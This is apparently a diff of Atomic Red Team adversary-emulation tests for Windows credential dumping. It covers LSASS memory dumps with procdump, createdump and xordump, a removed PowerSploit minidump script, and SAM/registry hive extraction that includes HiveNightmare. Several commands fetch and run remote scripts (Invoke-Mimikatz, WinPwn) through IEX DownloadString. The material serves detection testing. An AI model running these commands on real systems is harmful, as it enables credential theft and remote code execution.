auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: path
default: PathToAtomicsFolder..\ExternalPayloads\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with createdump.exe from .Net v5
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
.Net v5 must be installed
prereq_command: |
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
get_prereq_command: |
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
executor:
command: |
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
cleanup_command: |
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
supported_platforms:
- windows
input_arguments:
xordump_exe:
description: Path to xordump
type: path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
Computer must have xordump.exe
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
atomics/T1003.001/src/Out-Minidump.ps1
-130
View File
@@ -1,130 +0,0 @@
function Out-Minidump
{
<#
.SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch.
.PARAMETER Process
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
.PARAMETER DumpFilePath
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
.EXAMPLE
Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
.EXAMPLE
Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
.EXAMPLE
Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.
.INPUTS
System.Diagnostics.Process
You can pipe a process object to Out-Minidump.
.OUTPUTS
System.IO.FileInfo
.LINK
http://www.exploit-monday.com/
#>
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[System.Diagnostics.Process]
$Process,
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}
}
atomics/T1003.002/T1003.002.md
-336
View File
@@ -1,336 +0,0 @@
# T1003.002 - OS Credential Dumping: Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
<br/>
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live registry
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | string | SAM|
| copy_dest | Destination of the copied file | string | %temp%|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
<br/>
<br/>
## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
```
#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```
<br/>
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `command_prompt`!
```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
```
#### Cleanup Commands:
```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
<br/>
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|
#### Attack Commands: Run with `powershell`!
```powershell
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
#### Cleanup Commands:
```powershell
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
<br/>
<br/>
## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
<br/>

Some files were not shown because too many files have changed in this diff Show More